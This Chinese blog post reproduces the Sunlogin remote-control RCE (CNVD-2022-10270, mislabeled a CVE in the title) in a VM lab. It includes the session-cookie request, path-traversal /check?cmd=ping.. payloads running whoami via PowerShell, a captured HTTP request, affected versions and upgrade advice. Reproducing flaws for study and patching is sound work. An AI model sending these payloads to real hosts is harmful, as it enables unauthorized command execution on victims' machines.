2025年最新CVE-2022-10270漏洞复现

一.漏洞描述

在向日葵远程控制软件 Windows 版本中存在命令执行漏洞(也曾被标记为 CNVD-2022-10270 )。远程攻击者在未授权情况下可通过构造特殊请求执行任意命令。

二.漏洞原理

当向日葵client在windows运行时,会连接远程Oray的服务器,开放对外接口,接口统一由sunlogin 处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check 处,当cmd的值为ping/nslookup开头时触发

向日葵在启动的时候会随机启动一个40000+高位端口,具体在 sub_140E0AAE8 可看到,随后载入IDA,对CID关键字进行搜索sub_140E20938、sub_140E1C954、sub_140E1A1F4,往上跟发现分别对应接口/cgi-bin/rpc 和 /cgi-bin/login.cgi ,其中在函数 sub_140E1C954 对应接口功能 /cgi-bin/rpc 中,传入如下参数即可在未授权的情况下获取到有效session,在知道被控端的验证码和识别码的情况下传入如下参数可获取到session。在知道主机的帐密的情况下通过 /cgi-bin/login.cgi 接口传入如下参数可获取到session 并返回设备的公网、内网地址等信息,该接口同时可用作暴力破解

在向日葵远程控制软件 Windows 版本的低版本中存在未授权访问漏洞。当用户打开旧版本的向日葵软件后,会开放未授权的端口,攻击者能够通过该端口在不需要密码的情况下获取 session(会话)。获取 session 后,攻击者可借助该会话,向特定接口(如 /check 处 )构造恶意请求。当请求参数中 cmd 的值以 ping 或者 nslookup 等开头时,就能构造命令实现远程命令执行,进而获取服务器权限。另外,也可通过向日葵客户端开放的 web 服务随机端口获取 Cookie CID,构造恶意请求执行命令以获取服务器控制权限 。

三.漏洞利用

首先我们下载有漏洞的版本

这个实验 我放在虚拟机里边使用

第一种复现方式 我们用下载的工具进行复现

我们在虚拟机里安装好之后

xrkRcePro -h 192.168.25.175 -t scan

xrkRcePro -h 192.168.25.175 -t rce -p 50065 -c "whoami"

这里没有复现成功

第二种方式 在网址输入

http://192.168.25.175:50065/

出现这个界面 就是有漏洞的

然后我们输入

http://192.168.25.175:50065/cgi-bin/rpc?action=verify-haras

获取cookie

Cookie: CID=0243aFf9X19BCrB9vrfSLludf4jc9lai(替换为自己的cookie)(这里我的cookie变了 是因为我刷新界面了)

这里的payload可以是

/check?cmd=ping..%26c:%26%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami

也可以是

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

我们进行抓包

GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami HTTP/1.1
Host: 192.168.25.175:50065
Cookie: CID=0243aFf9X19BCrB9vrfSLludf4jc9lai(替换为自己的cookie)
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0

运行成功

想了解更多看这个

向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现-云社区-华为云

四.影响版本

向日葵个人版 for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315(2021.12)

五.修复建议

官方已发布修复该漏洞的新版本,受影响的用户可以前往向日葵官网(向日葵远程控制软件_远程控制电脑手机_远程桌面连接_远程办公|游戏|运维-贝锐向日葵官网 ),下载并安装最新版本的向日葵个人版软件(如 Windows 12.5.0.44227 及更新版本 ),及时更新以修复此高危安全漏洞。同时,相关单位也应迅速排查本单位及第三方供应商有关 “向日葵” 软件的使用情况,督促及时升级版本。此外,日常使用中还应加强网络运维管理,严格限制远程接入和安全审计,做好安全监测和应急处置准备。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值